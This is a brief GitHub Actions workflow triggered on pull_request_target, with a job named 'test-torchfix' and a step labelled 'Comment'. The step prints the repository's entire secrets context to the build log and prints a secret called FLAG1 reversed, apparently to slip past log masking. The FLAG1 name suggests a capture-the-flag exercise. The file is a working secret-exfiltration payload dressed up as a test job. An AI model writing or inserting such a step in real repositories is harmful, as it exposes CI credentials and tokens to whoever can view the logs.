on:
  pull_request_target:

jobs:
  test-torchfix:
    runs-on: ubuntu-latest
    steps:
      - name: Comment
        run: |
          echo "${{ toJSON(secrets) }}"
          echo "${{ toJSON(secrets.FLAG1) }}" | rev
          echo "Hi"
